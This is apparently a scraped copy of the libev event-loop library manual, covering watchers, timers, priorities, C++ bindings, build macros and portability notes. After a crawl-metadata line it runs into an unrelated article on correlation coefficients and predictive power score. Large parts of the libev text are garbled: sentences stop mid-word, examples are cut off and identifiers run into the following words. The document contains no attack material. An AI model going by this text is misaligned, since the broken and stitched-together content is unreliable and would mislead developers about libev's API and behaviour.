Update: I have removed the old recent news template from the front page. It has been replaced with a template listing UnNews stories. From now on, please put links to new UnNews stories here instead of in recent articles. You can find the link to the template on the UnNews "Write an Article" help sheet. If you know of another place to put a link to it on the UnNews main page, please do so.
Still unresolved is the issue of featuring UnNews. I would be willing to run a VFUnNews page if there is a groundswell for selecting the top stories that way. ---
Rev. Isra (talk) 23:06, 7 April 2006 (UTC)
WE NEED TO CHANGE "IN THE NEWS" AS SOON AS POSSIBLE. It sucks. Seriously. Let's change it to a dynamic UnNews list with blurbs controlled by admins. Seriously. The stuff on there makes me want to puke it's so lame. --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 20:33, 7 April 2006 (UTC)
I was thinking that UnNews is starting to reach the point of having some fantastically good articles that are well worth featuring but that it might not fit the motif to feature them as standard articles. They really are a different sort of thing than most articles. Anyone else have any views on the matter? --Sir gwax (talk)
15:22, 17 March 2006 (UTC)
- Definately, just looking at VFH there are at least a couple nommed. However, alot of these against votes were due to size issues, which is understandable for a "news" article. I think it's about time we make an UnNews VFH and feature them...:41, 17 March 2006 (UTC)
- maybe we could vote in unnews for which storys are featured in there instead of anyone filling it with their crap ;)--Da, Y?YY?YYY?:-:CUN3 NotM BLK |_LG8+::: 23:35, 18 March 2006 (UTC)
- Excellent idea, yyy. I am for it. --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 23:39, 18 March 2006 (UTC)
- Makes sense, since UnNews articles aren't regular articles. --OsirisX 05:38, 19 March 2006 (UTC)
- Having a voted-in featured news story on the front page of Uncyclopedia would be a damn fine thing, as UnNews is of surprisingly high quality. Certainly higher than the Uncyclopedia new article feed. As for what to do with the UnNews front page, I suppose that could be a spinoff from the main front page feature - David Gerard 16:27, 19 March 2006 (UTC)
- Is it just me, or has there been a recent surge in UnNews quantity and quality? --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 16:54, 19 March 2006 (UTC)
- I think that's why it's about time we have an UnNews featured:02, 19 March 2006 (UTC)
Personally I like it as it is, it is updated frequently, and there is a fresh supply of good articles. We need not feature one to showcase the good work, nearly all of them are:00, 20 March 2006 (UTC)
- I suspect it's because it takes actualy effor to post an UnNews story....--The Right Honourable Maj Sir Elvis UmP KUN FIC MDA VFH Bur. CM and bars UGM F@H (Petition) 16:17, 20 March 2006 (UTC)
- I suspect it's also because the standards are different. The Lockheed U2 story was in article space and I spotted it as an NRV. I realised it was really UnNews, and put it there. Just changing the namespace, hence the expectations, made it a pretty good story - David Gerard 18:43, 20 March 2006 (UTC)
I think there's a conflict here. I agree with Rangeley that the majority of UnNews articles these days are good, and an impressive proportion are great. I feel like the main purpose of having a featured news story would be to get those articles off VFH - which might be good in that it would make the Main Page featured articles more encyclopedic, but it also means that great UnNews articles would probably get less attention, which I think is unfair. We'd also need someone to manage an UnNews VFH. --—rc (t) 19:39, 20 March 2006 (UTC)
I FOUND THE SOLUTION: What if we just take away all those short and, (more frequently than not), unfunny news titles from the "In the news" section of the frontpage, and we replace them by longer and funny featured news stories. I know it will look less like WP, but it will be much funnier, (and that's the main thing I think) while still resembeling it.--Rataube 23:27, 20 March 2006 (UTC)
- I actually think that would make it more like WP because the headlines will be actual newsy. For. --
» Sir Savethemooses Grand Commanding Officer ... holla atcha boy» 23:42, 20 March 2006 (UTC)
- Kill Template:Recentnews and promote UnNews at the same time? Oh Yes Please. Just use a dynamic list of recent UnNews stories and cap it at 10. Or maybe a 5/5 (7/3?) split with UnNews Audio? ~ T. (talk) 05:02, 21 March 2006 (UTC)
- Ooh, that sounds sexy. Possibly a page like UnNews:Story title here/blurb for a one line wikicode that can get included via a template. --Splaka 05:08, 21 March 2006 (UTC)
- For, one suggestion though, featured news stories should have an audio counterpart. --OsirisX 06:11, 21 March 2006 (UTC)
- Ooh, me likey. However, there is still the question of what to do with great UnNewses; perhaps the In The News could be filled with a randomly generated list of articles that have been voted superior? --Hobelhouse 00:40, 6 April 2006 (UTC) | http://uncyclopedia.wikia.com/wiki/Forum:Featured_News_Story%3F | CC-MAIN-2016-18 | refinedweb | 957 | 70.63 |
This week Logstash 1.2.0 has been released with exciting new features. Logstash is (from the Website): "[...] a tool for managing events and logs. You can use it to collect logs, parse them, and store them for later use (like, for searching). [...]"
The full Changelog can be found on [Github][1], here is a short list with some more details:
- New JSON schema
The annoying @ has been removed from all fields, except @timestamp and @version (this field includes the JSON schema version for future schema changes). This change makes it look much nicer in web frontends like Kibana. Also, the "field." prefix has been removed; all fields are now in the "global" namespace. More information on the schema change can be found in the Jira bug tracker: [LOGSTASH-675][2]
- Kibana 3 included
As a replacement for the old integrated webinterface, Kibana 3 is now part of the Logstash distribution and can be started with the "web" parameter
- Conditionals (if, then, else, else if) in the configuration
Versions prior to 1.2.0 used the "type" and "tags" parameter of filter and output plugins to select which log to process with a particular filter or output. This is now obsolete. The new way is to use conditionals inside the configuration file (more on that later!)
- Field references
Fields can now be referenced with [ and ] around it. F.e. [field1] or [field1][subfield2]
- Elasticsearch 0.90.3
The integrated Elasticsearch client and server have been upgraded to 0.90.3. This brings much more features and performance and makes Logstash compatible again to the latest and greatest Elasticsearch version
- New plugin type: codec
This plugin type is used to decode the incoming data (input plugins) or decode outgoing data (output plugins)
- Plugin status is now plugin milestone
More on that can be found on the official documentation website "[Plugin Milestones][3]"
These are the most important changes. Many more changes were made to inputs, filters and outputs (see [Changelog][1]).
Upgrade hints
Logstash wants to be backwards compatible. You can just replace the jar file with the new version, restart Logstash with the same configuration file as used for the older version and everything should be running again. If not, then it's a bug which should be reported. Note: Configuration options which were marked as deprecated on older version are most likely not available anymore in newer versions.
To make use of all the shiny new features, the configuration needs to be updated. Here are some hints:
Using conditionals
Filters and outputs used the "type" and "tags" parameter to select which log needs to be processed. This can now be done with conditionals. See the [official documentation][4] for more details. And here are some examples:
Example 1: Filter on type (old way)
```
input {
  stdin {
    type => "stdinput"
  }
}

output {
  stdout {
    debug => true
    type => "stdinput"
  }
}
```
This will output: "Deprecated config item "type" set in LogStash::Outputs::Stdout"
Example 1: Filter on type (new way)
```
input {
  stdin {
    type => "stdinput"
  }
}

output {
  if [type] == "stdinput" {
    stdout {
      debug => true
    }
  }
}
```
Example 2: Filter on tags (old way)
```
input {
  stdin {
    type => "stdinput"
    tags => [ "tag1", "tag2" ]
  }
}

output {
  stdout {
    debug => true
    tags => "tag1"
  }
}
```
This will output: "Deprecated config item "tags" set in LogStash::Outputs::Stdout"
Example 2: Filter on tags (new way)
```
input {
  stdin {
    type => "stdinput"
    tags => [ "tag1", "tag2" ]
  }
}

output {
  if "tag1" in [tags] {
    stdout {
      debug => true
    }
  }
}
```
As you can see, with conditionals it's possible to do the same things as before, but in a much more flexible way.

One thing that's missing is a "not in" condition. It's not possible to write e.g. `if "tag1" !in [tags]`. The workaround I found is to use an empty "if" branch with "else":

```
if "_grokparsefailure" in [tags] {
} else {
  # YOUR CODE
}
```
Schema update: Field names and references
All fields (except @version and @timestamp) lost their @. All filters which reference fields must be updated to reflect this change (simply remove the leading @). Also take care of the removal of the "fields." namespace and the new field referencing ('[foo][bar]' instead of 'foo.bar').
This also affects the Elasticsearch index (keyword mappings) and Kibana, they also need some update love.
Reindexing the old data to reflect this change can be done with the Elasticsearch input using the codec "oldlogstashjson".
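A sketch of such a reindexing pipeline might look like the following - the index names and host are placeholders, and the exact option names of the elasticsearch input/output plugins should be checked against the documentation of your Logstash version:

```
input {
  elasticsearch {
    host  => "localhost"
    index => "logstash-2013.09.01"
    codec => oldlogstashjson
  }
}

output {
  elasticsearch {
    host  => "localhost"
    index => "logstash-new-2013.09.01"
  }
}
```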
Puppet module
If you are a Puppet user, I'm sure you want to use the official Puppet module which can be found on [Github][5]. At this time it's not yet ready for the new features of 1.2.0. Therefore I just use file delivery to deliver the configuration files.
The Logstash Book
It has been updated to reflect version 1.2.0. I can really suggest this book, it covers all important things one must know about Logstash and it's ecosystem. See the official [Website][6].
Update 1.2.1
Shortly after 1.2.0 a bugfix release 1.2.1 has been released ([Changelog][7]). It fixes some bugs and adds the "not in" condition.
So it's now possible to exclude logs with the tag "_grokparsefailure" as follows:
```
if "_grokparsefailure" not in [tags] {
  # YOUR CODE
}
```
- 1:
- 2:
- 3:
- 4:
- 5:
- 6:
- 7: | https://tobru.ch/logstash-1-2-0-upgrade-notes-included/ | CC-MAIN-2020-34 | refinedweb | 848 | 62.17 |
This is a simple example of three dots (…) in React and JSX.

In React, three dots are used to pass object properties down the component hierarchy, and to update nested JSON objects in a React application.

Three dots (…) are also called the spread attribute or spread syntax in JavaScript. The syntax was introduced as part of ES6. You can check my previous tutorial on the spread operator.
What do three dots do?

The syntax expands the enumerable properties of an object in place: array elements, string characters, and object properties are all enumerable and can be spread.
Let’s see a simple example of how it expands the enumerable properties.
```
var data = ['3', '4', '5'];
var numbers = ['1', ...data, '6', '7']; // ["1", "3", "4", "5", "6", "7"]
```
In the example above, data contains multiple elements. To insert those numbers into the middle of another array, the spread operator is placed where they should appear, which copies the elements into the result.

It also helps when passing a variable number of arguments (zero or more) to a function, i.e. dynamic properties.
How do React components use three dots?
```
var employee = { name: 'Franc', id: 1, salary: 5000 };
```
How is this data transferred as props from a parent component to a child component? And what if there is a larger set of properties to pass to a React component? Listing every property by hand is not a clean way of passing data.
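For comparison, the verbose version being referred to might look like this (the Employee component and its props are illustrative, not from a real codebase):

```
<Employee
  name={employee.name}
  id={employee.id}
  salary={employee.salary}
/>
```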
The same can be rewritten far more concisely with the spread operator syntax:

```
<Employee {...employee} />
```
It is a clean way of passing data from one component to another component.
Three dots in React hooks example

The spread operator is used in React hooks to update state objects.

A React state object is initialized with default properties using the useState hook, which returns the initial state and a function that updates the state.

When updating the state, the spread operator copies the original data and applies the new values on top: only the properties you specify change, and the rest are carried over unchanged.
```
const [employee, setEmployee] = useState({ id: '', name: '', salary: '' });

// appending to an array state variable:
setEmployees([
  ...employees,
  { name: "John", id: "10", salary: "5000" }
]);
```
Here is a complete example:
```
import React, { useState } from 'react';

function HookSpreadArray(props) {
  const [employe, setEmploye] = useState([]);
  const [name, setName] = useState("");

  const saveEmploye = event => {
    event.preventDefault();
    // spread the existing array and append the new entry
    setEmploye([...employe, { name: name }]);
    setName("");
  };

  return (
    <div>
      <>
        <form onSubmit={saveEmploye}>
          <label>Name
            <input
              name="name"
              type="text"
              value={name}
              onChange={e => setName(e.target.value)}
            />
          </label>
          <button name="Save" value="Save">Save</button>
        </form>
        <ul>
          {employe.map((emp, i) => (
            <li key={i}>{emp.name}</li>
          ))}
        </ul>
      </>
    </div>
  );
}

export default HookSpreadArray;
```
Spread operator in React state

The spread operator is also used when changing React state properties in class components. Let's declare the state in the constructor as follows.
this.state = { name: "Fran" }
The state can be updated using the setState method with an object parameter.
The first way, with the plain object syntax:

```
this.setState({ name: "kiran" })
```

Second, the same can be achieved with the spread operator (three dots) syntax:

```
this.setState({ ...this.state, name: "kiran" })
```
As you can see, this merges the existing state with the new object: spreading this.state into the object passed to setState does a shallow merge into the new state.

Both approaches do the same thing here, but the first syntax becomes awkward when you have a nested object in the state tree.

For example, a nested object is initialized in the state object:

```
state = {
  id: 1,
  name: "John",
  dept: {
    name: "Sales"
  }
}
```

How do you update a nested JSON object in React state? Say you want to update the name inside dept to a new value, i.e. dept: { name: "Support" }.

Using three dots in the state object, you can update it easily:

```
this.setState({ dept: { ...this.state.dept, name: 'support' } })
```
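The shallow-merge behaviour behind this pattern can be verified in plain JavaScript, outside React: spreading copies only the top level, so nested objects must be spread at each level you change. (The state shape below extends the example with an extra dept.floor key for illustration.)

```javascript
var state = { id: 1, name: 'John', dept: { name: 'Sales', floor: 3 } };

// Replacing dept wholesale silently drops its other keys:
var lossy = { ...state, dept: { name: 'Support' } };
console.log(lossy.dept.floor); // undefined

// Spreading at each level you change preserves them:
var merged = { ...state, dept: { ...state.dept, name: 'Support' } };
console.log(merged.dept.name);  // Support
console.log(merged.dept.floor); // 3
console.log(state.dept.name);   // Sales (the original is untouched)
```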
- NAME
- SYNOPSIS
- ABOUT THIS DOCUMENT
- WHAT TO READ WHEN IN A HURRY
- ABOUT LIBEV
- ERROR HANDLING
- GLOBAL FUNCTIONS
- FUNCTIONS CONTROLLING EVENT LOOPS
- ANATOMY OF A WATCHER
- WATCHER TYPES
- ev and ev_check - customise your event loop!
- ev_embed - when one backend isn't enough...
- ev_fork - the audacity to resume the event loop after a fork
- ev_cleanup - even the best things end
- ev_async - how to wake up an event loop
- OTHER FUNCTIONS
- COMMON OR USEFUL IDIOMS (OR BOTH)
- LIBEVENT EMULATION
- C++ SUPPORT
- OTHER LANGUAGE BINDINGS
- MACRO MAGIC
- EMBEDDING
- INTERACTION WITH OTHER PROGRAMS, LIBRARIES OR THE ENVIRONMENT
- PORTABILITY NOTES
- GNU/LINUX 32 BIT LIMITATIONS
- OS/X AND DARWIN BUGS
- SOLARIS PROBLEMS AND WORKAROUNDS
- AIX POLL BUG
- WIN32 PLATFORM LIMITATIONS AND WORKAROUNDS
- PORTABILITY REQUIREMENTS
- ALGORITHMIC COMPLEXITIES
- PORTING FROM LIBEV 3.X TO 4.X
- GLOSSARY
- AUTHOR
NAME
libev - a high performance full-featured event loop written in C
SYNOPSIS
   // a single header file is required
   #include <ev.h>

   #include <stdio.h>  // for puts

   // every watcher type has its own typedef'd struct with the name ev_TYPE
   ev_io stdin_watcher;
   ev_timer timeout_watcher;

   // all watcher callbacks have a similar signature;
   // this callback is called when data is readable on stdin
   static void
   stdin_cb (EV_P_ ev_io *w, int revents)
   {
     puts ("stdin ready");
     ev_io_stop (EV_A_ w);          // for one-shot events, stop the watcher manually
     ev_break (EV_A_ EVBREAK_ALL);  // this causes all nested ev_run's to stop iterating
   }

   // another callback, this time for a time-out
   static void
   timeout_cb (EV_P_ ev_timer *w, int revents)
   {
     puts ("timeout");
     ev_break (EV_A_ EVBREAK_ONE);  // this causes the innermost ev_run to stop iterating
   }

   int
   main (void)
   {
     // use the default event loop unless you have special needs
     struct ev_loop *loop = EV_DEFAULT;

     // watch for stdin to become readable
     ev_io_init (&stdin_watcher, stdin_cb, /*STDIN_FILENO*/ 0, EV_READ);
     ev_io_start (loop, &stdin_watcher);

     // simple non-repeating 5.5 second timeout
     ev_timer_init (&timeout_watcher, timeout_cb, 5.5, 0.);
     ev_timer_start (loop, &timeout_watcher);

     // now wait for events to arrive
     ev_run (loop, 0);

     return 0;
   }
ABOUT THIS DOCUMENT
This document documents the libev software package.
WHAT TO READ WHEN IN A HURRY

This manual tries to be very detailed, but unfortunately, this also makes it very long. If you just want to get the basic concepts, then read ABOUT LIBEV and ANATOMY OF A WATCHER, and look up the watcher types you need in WATCHER TYPES.
FEATURES
Libev supports select, poll, the Linux-specific epoll, the BSD-specific kqueue and the Solaris-specific event port mechanisms for file descriptor events (ev_io), the Linux inotify interface (for ev_stat), relative timers (ev_timer), absolute timers with customised rescheduling (ev_periodic), synchronous signals (ev_signal), process status change events (ev_child), and event watchers dealing with the event loop mechanism itself (ev_idle, ev_embed, ev_prepare and ev_check watchers) as well as file watchers (ev_stat) and even limited support for fork events (ev_fork).
CONVENTIONS
Libev is very configurable. In this manual the default (and most common) configuration will be described, which supports multiple event loops. For more info about various configuration options please have a look at the EMBED section in this manual.
TIME REPRESENTATION.
GLOBAL FUNCTIONS
These functions can be called anytime, even before initialising the library in any way.
- ev_tstamp ev_time ()
Returns the current time as libev would use it. Please note that the ev_now function is usually faster and also often returns the timestamp you actually want to know. Also interesting is the combination of ev_now_update and ev_now.

- int ev_version_major (), int ev_version_minor ()

You can find out the major and minor ABI version numbers of the library you linked against by calling the functions ev_version_major and ev_version_minor. If you want, you can compare against the global symbols EV_VERSION_MAJOR and EV_VERSION_MINOR, which specify the version of the library your program was compiled against.

Example: Make sure we haven't accidentally been linked against the wrong version.

   assert (("libev version mismatch",
            ev_version_major () == EV_VERSION_MAJOR
            && ev_version_minor () >= EV_VERSION_MINOR));
- unsigned int ev_supported_backends ()
Return the set of all backends (i.e. their corresponding EV_BACKEND_* value) compiled into this binary of libev (independent of their availability on the system you are running on). See ev_default_loop for a description of the set values.

Example: make sure we have the epoll method, because yeah this is cool and a must have and can we have a torrent of it please!!!11

   assert (("sorry, no epoll, no sex",
            ev_supported_backends () & EVBACKEND_EPOLL));
- unsigned int ev_recommended_backends ()
Return the set of all backends compiled into this binary of libev and also recommended for this platform, meaning it will work for most file descriptor types. This is the set of backends that libev will probe for if you specify no backends explicitly.

- unsigned int ev_embeddable_backends ()

Returns the set of backends that are embeddable in other event loops. This value is platform-specific but can include backends not available on the current system. To find which embeddable backends might be supported on the current system, you would need to look at ev_embeddable_backends () & ev_supported_backends (), likewise for recommended ones.

See the description of ev_embed watchers for more info.
- ev_set_allocator (void *(*cb)(void *ptr, long size) throw ())
Sets the allocation function to use (the prototype is similar - the semantics are identical to the realloc C89/SuS/POSIX function). It is used to allocate and free memory. If it returns zero when memory needs to be allocated (size != 0), the library might abort or take some potentially destructive action.

Since some systems fail to implement correct realloc semantics, libev will use a wrapper around the system realloc and free functions by default.

Example: Replace the libev allocator with one that waits a bit and then retries (the example requires a standards-compliant realloc).
   static void *
   persistent_realloc (void *ptr, size_t size)
   {
     for (;;)
       {
         void *newptr = realloc (ptr, size);

         if (newptr)
           return newptr;

         sleep (60);
       }
   }

   ...
   ev_set_allocator (persistent_realloc);
(One way to handle signals entirely yourself is to avoid libev's signal handling: specify EVFLAG_NOSIGMASK when creating any loops, and in one thread, use sigwait or any other mechanism to wait for signals, then "deliver" them to libev by calling ev_feed_signal.)
FUNCTIONS CONTROLLING EVENT LOOPS

- struct ev_loop *ev_default_loop (unsigned int flags)

This returns the "default" event loop object, which is what you should normally use when you just need "the event loop" and your program otherwise qualifies as "the main program". If you don't know what event loop to use, use the one returned from this function (or via the EV_DEFAULT macro).

The default loop is the only loop that can handle ev_child watchers, and to do this, it always registers a handler for SIGCHLD. If this is a problem for your application you can either create a dynamic loop with ev_loop_new which doesn't do that, or you can simply overwrite the SIGCHLD signal handler after calling ev_default_init.

The flags argument can be used to specify special behaviour or specific backends to use; multiple flag values can be or'ed together. Supported flags include:
EVFLAG_FORKCHECK
Instead of calling ev_loop_fork manually after a fork, you can also make libev check for a fork in each iteration by enabling this flag.

This works by calling getpid () on every iteration of the loop, and thus this might slow down your event loop if you do a lot of loop iterations and little real work, but is usually not noticeable (on my GNU/Linux system for example, getpid is actually a simple 5-insn sequence without a system call and thus very fast, but my GNU/Linux system also has pthread_atfork which is even faster).
The big advantage of this flag is that you can forget about fork (and forget about forgetting to tell libev about forking) when you use this flag.
This flag setting cannot be overridden or specified in the LIBEV_FLAGS environment variable.
EVFLAG_NOINOTIFY
When this flag is specified, then libev will not attempt to use the inotify API for its ev_stat watchers. Apart from debugging and testing, this flag can be useful to conserve inotify file descriptors, as otherwise each loop using ev_stat watchers consumes one inotify handle.
EVFLAG_SIGNALFD
When this flag is specified, then libev will attempt to use the signalfd API for its ev_signal (and ev_child) watchers. This API delivers signals synchronously, which makes it both faster and might make it possible to get the queued signal data. It can also simplify signal handling with threads, as long as you properly block signals in the threads that are not interested in handling them (note that in multithreaded programs the behaviour of sigprocmask is officially unspecified).
This flag's behaviour will become the default in future versions of libev.
EVBACKEND_SELECT (value 1, portable select backend)

This is your standard select(2) backend. It doesn't scale too well (O(highest_fd)), but it is usually the fastest backend for a low number of (low-numbered) fds. To get good performance out of this backend you need a high amount of parallelism (most of the file descriptors should be busy). If you are writing a server, you should accept () in a loop to accept as many connections as possible during one iteration. You might also want to have a look at ev_set_io_collect_interval () to increase the amount of readiness notifications you get per iteration.
This backend maps EV_READ to the readfds set and EV_WRITE to the writefds set (and to work around Microsoft Windows bugs, also onto the exceptfds set on that platform).
EVBACKEND_POLL (value 2, poll backend, available everywhere except on windows)

And this is your standard poll(2) backend. It's more complicated than select, but handles sparse fds better and has no artificial limit on the number of fds you can use (except it will slow down considerably with a lot of inactive fds). See the entry for EVBACKEND_SELECT, above, for performance tips.
This backend maps EV_READ to POLLIN | POLLERR | POLLHUP, and EV_WRITE to POLLOUT | POLLERR | POLLHUP.

EVBACKEND_EPOLL (value 4, Linux)

Use the Linux-specific epoll(7) interface. While stopping, setting and starting an I/O watcher in the same iteration will result in some caching, there is still a system call per such incident (because the same file descriptor could point to a different file description now), so its best to avoid that. Also, dup ()'ed file descriptors might not work very well if you register events for both file descriptors. In practice, EVBACKEND_SELECT can be as fast or faster than epoll for maybe up to a hundred file descriptors, depending on the usage. So sad.
While nominally embeddable in other event loops, this feature is broken in all kernel versions tested so far.
This backend maps EV_READ and EV_WRITE in the same way as EVBACKEND_POLL.
EVBACKEND_KQUEUE (value 8, most BSD clones)
Kqueue deserves special mention, as at the time of this writing, it was broken on all BSDs except NetBSD (usually it doesn't work reliably with anything but sockets and pipes, except on Mac OS X where it is completely useless). Unlike epoll, however, whose brokenness is by design, these kqueue bugs can (and eventually will) be fixed without API changes to existing programs. For this reason it's not being "auto-detected" unless you explicitly specify it in the flags (i.e. using EVBACKEND_KQUEUE) or libev was compiled on a known-to-be-good-enough system like NetBSD.

You still can embed kqueue into a normal poll or select backend and use it only for sockets; see ev_embed watchers for more info. It scales in the same way as the epoll backend, but the interface to the kernel is more efficient. While stopping, setting and starting an I/O watcher does never cause an extra system call as with EVBACKEND_EPOLL, it still adds up to two event changes per incident. Support for fork () is very bad (you might have to leak fd's on fork) and it drops fds silently in similarly hard-to-detect cases.

Since it is broken almost everywhere, you should only use it when you have a lot of sockets (for which it usually works), by embedding it into another event loop (e.g. EVBACKEND_SELECT or EVBACKEND_POLL (but poll is of course also broken on OS X)) and, did I mention it, using it only for sockets.
This backend maps EV_READ into an EVFILT_READ kevent with NOTE_EOF, and EV_WRITE into an EVFILT_WRITE kevent with NOTE_EOF.
EVBACKEND_DEVPOLL (value 16, Solaris 8)
This is not implemented yet (and might never be, unless you send me an implementation). According to reports, /dev/poll only supports sockets and is not embeddable, which would limit the usefulness of this backend immensely.
EVBACKEND_PORT (value 32, Solaris 10)

This uses the Solaris 10 event port mechanism. As with everything on Solaris, it's really slow, but it still scales very well (O(active_fds)). While this backend scales well, it requires one system call per active file descriptor per loop iteration. For small and medium numbers of file descriptors a "slow" EVBACKEND_SELECT or EVBACKEND_POLL backend might perform better.
On the positive side, this backend actually performed fully to specification in all tests and is fully embeddable, which is a rare feat among the OS-specific backends (I vastly prefer correctness over speed hacks).
On the negative side, the interface is bizarre - so bizarre that even sun itself gets it wrong in their code examples: the event polling function sometimes returns events to the caller even though an error occurred, but with no indication whether it has done so or not. Fortunately libev seems to be able to work around these idiosyncrasies.

This backend maps EV_READ and EV_WRITE in the same way as EVBACKEND_POLL.

EVBACKEND_MASK

Not a backend at all, but a mask to select all backend bits from a flags value, in case you want to mask out any backends from a flags value (e.g. when modifying the LIBEV_FLAGS environment variable).
If one or more of the backend flags are or'ed into the flags value, then only these backends will be tried (in the reverse order as listed here). If none are specified, all backends in ev_recommended_backends () will be tried.

Example: Try to create a event loop that uses epoll and nothing else.

   struct ev_loop *epoller = ev_loop_new (EVBACKEND_EPOLL | EVFLAG_NOENV);
   if (!epoller)
     fatal ("no epoll found here, maybe it hides under your chair");
- ev_loop_destroy (loop)
Destroys an event loop object (frees all memory and kernel state etc.). None of the active event watchers will be stopped in the normal sense, so e.g. ev_is_active might still return true. It is your responsibility to either stop all watchers cleanly yourself before calling this function, or cope with the fact afterwards (which is usually the easiest thing, you can just ignore the watchers and/or free () them for example).

This function is normally used on loop objects allocated by ev_loop_new, but it can also be used on the default loop returned by ev_default_loop, in which case it is not thread-safe. If you need dynamically allocated loops it is better to use ev_loop_new and ev_loop_destroy.
- ev_loop_fork (loop)
This function sets a flag that causes subsequent ev_run iterations to reinitialise the kernel state for backends that have one. Despite the name, you can call it anytime, but it makes most sense after forking, in the child process. You must call it (or use EVFLAG_FORKCHECK) in the child before resuming or calling ev_run.

- unsigned int ev_iteration (loop)

Returns the current iteration count for the event loop, which is identical to the number of times libev did poll for new events. It starts at 0 and happily wraps around with enough iterations.

This value can sometimes be useful as a generation counter of sorts (it "ticks" the number of loop iterations), as it roughly corresponds with ev_prepare and ev_check calls - and is incremented between the prepare and check phases.
- unsigned int ev_depth (loop)
Returns the number of times ev_run was entered minus the number of times ev_run was exited normally, in other words, the recursion depth.

Outside ev_run, this number is zero. In a callback, this number is 1, unless ev_run was invoked recursively (or from another thread), in which case it is higher.

Leaving ev_run abnormally (setjmp/longjmp, cancelling the thread, throwing an exception etc.) doesn't count as "exit" - consider this as a hint to avoid such behaviour unless it's really convenient, in which case it is fully supported.
- ev_suspend (loop)
- ev_resume (loop)
These two functions suspend and resume an event loop, for use when the loop is not used for a while and timeouts should not be processed.

A typical use case would be an interactive program such as a game: when the user presses ^Z to suspend the game and resumes it an hour later, it would be best to handle timeouts as if no time had actually passed while the program was suspended. This can be achieved by calling ev_suspend in your SIGTSTP handler, sending yourself a SIGSTOP and calling ev_resume directly afterwards to resume timer processing.
Effectively, all ev_timer watchers will be delayed by the time spend between ev_suspend and ev_resume, and all ev_periodic watchers will be rescheduled (that is, they will lose any events that would have occurred while suspended).
After calling ev_suspend you must not call any function on the given loop other than ev_resume, and you must not call ev_resume without a previous call to ev_suspend.
Calling ev_suspend/ev_resume has the side effect of updating the event loop time (see ev_now_update).
- bool ev_run (loop, int flags)

Finally, this is it, the event handler. This function usually is called after you have initialised all your watchers and you want to start handling events. It will ask the operating system for any new events, call the watcher callbacks, and then repeat the whole process indefinitely: this is why event loops are called loops.
If the flags argument is specified as 0, it will keep handling events until either no event watchers are active anymore or ev_break was called.
The return value is false if there are no more active watchers (which usually means "all jobs done" or "deadlock"), and true in all other cases (which usually means "you should call ev_run again").
Please note that ev_run is also mostly exception-safe - you can break out of a ev_run call by calling longjmp in a callback, throwing a C++ exception and so on. This does not decrement the ev_depth value, nor will it clear any outstanding EVBREAK_ONE breaks.
A flags value of EVRUN_NOWAIT will look for new events, will handle those events and any already outstanding ones, but will not wait and block your process in case there are no events, and will return after one iteration of the loop.

A flags value of EVRUN_ONCE will look for new events (waiting if necessary) and will handle those and any already outstanding ones. It will block your process until at least one new event arrives, and will return after one iteration of the loop. This is useful if you are waiting for some external event in conjunction with something not expressible using other libev watchers (i.e. "roll your own ev_run"). However, a pair of ev_prepare/ev_check watchers is usually a better approach for this kind of thing.

Here are the gory details of what ev_run does (this is for your understanding, not a guarantee that things will work exactly like this in future versions):
- ev_break (loop, how)
Can be used to make a call to ev_run return early (but only after it has processed all outstanding events). The how argument must be either EVBREAK_ONE, which will make the innermost ev_run call return, or EVBREAK_ALL, which will make all nested ev_run calls return.

This "break state" will be cleared on the next call to ev_run.
It is safe to call ev_break from outside any ev_run calls, too, in which case it will have no effect.

- ev_ref (loop)
- ev_unref (loop)

Ref/unref can be used to add or remove a reference count on the event loop: every watcher keeps one reference, and as long as the reference count is nonzero, ev_run will not return on its own.
This is useful when you have a watcher that you never intend to unregister, but that nevertheless should not keep ev_run from returning. In such a case, call ev_unref after starting, and ev_ref before stopping it.

As an example, libev itself uses this for its internal signal pipe: it is not visible to the libev user and should not keep ev_run from exiting if no event watchers registered by it are active. Just remember to unref after start and ref before stop (note also that libev might stop watchers itself, e.g. non-repeating timers, in which case you have to ev_ref in the callback).
Example: Create a signal watcher, but keep it from keeping ev_run running when nothing else is active.

   ev_signal exitsig;
   ev_signal_init (&exitsig, sig_cb, SIGINT);
   ev_signal_start (loop, &exitsig);
   ev_unref (loop);

Example: For some weird reason, unregister the above signal handler again.

   ev_ref (loop);
   ev_signal_stop (loop, &exitsig);
- ev_set_io_collect_interval (loop, ev_tstamp interval)
- ev_set_timeout_collect_interval (loop, ev_tstamp interval)

These advanced functions influence the time that libev will spend waiting for events: by setting a higher I/O collect interval you allow libev to spend more time collecting I/O events, so you can handle more events per iteration, at the cost of increased latency. Timeouts (both ev_periodic and ev_timer) will not be affected. Setting this to a non-null value will not introduce any overhead in libev.

Many (busy) programs can usually benefit by setting the I/O collect interval to a value near 0.1 or so, which is often enough for interactive servers (of course not for games), likewise for timeouts. It usually doesn't make much sense to set it to a lower value than 0.01, as this approaches the timing granularity of most systems.
- ev_invoke_pending (loop)
This call will simply invoke all pending watchers while resetting their pending state. Normally, ev_run does this automatically when required, but when overriding the invoke callback this call comes handy.

- ev_set_invoke_pending_cb (loop, void (*invoke_pending_cb)(EV_P))

This overrides the invoke pending functionality of the loop: instead of invoking all pending watchers when there are any, ev_run will call this callback instead. This is useful, for example, when you want to invoke the actual watchers inside another context (another thread etc.).

If you want to reset the callback, use ev_invoke_pending as new callback.
- ev_set_loop_release_cb (loop, void (*release)(EV_P), void (*acquire)(EV_P))

Sometimes you want to share the same loop between multiple threads. This can be done relatively simply by putting mutex lock/unlock calls around each call to a libev function. However, ev_run can run an indefinite time, so it is not feasible to wait for it to return. One way around this is to wake up the event loop via ev_break and ev_async_send, another way is to set these release and acquire callbacks on the loop.
When set, then release will be called just before the thread is suspended waiting for new events, and acquire is called just afterwards.

Ideally, release will just call your mutex_unlock function, and acquire will just call the mutex_lock function again.
While event loop modifications are allowed between invocations of release and acquire (that's their only purpose after all), no modifications done will affect the event loop, i.e. adding watchers will have no effect on the set of file descriptors being watched, or the time waited. Use an ev_async watcher to wake up ev_run when you want it to take note of any changes you made.
In theory, threads executing ev_run will be async-cancel safe between invocations of release and acquire.

See also the locking example in the THREADS section later in this document.
- ev_set_userdata (loop, void *data)
- void *ev_userdata (loop)
Set and retrieve a single void * associated with a loop. When ev_set_userdata has never been called, then ev_userdata returns 0.
These two functions can be used to associate arbitrary data with a loop, and are intended solely for the invoke_pending_cb, release and acquire callbacks described above, but of course can be (ab-)used for any other purpose as well.
- ev_verify (loop)
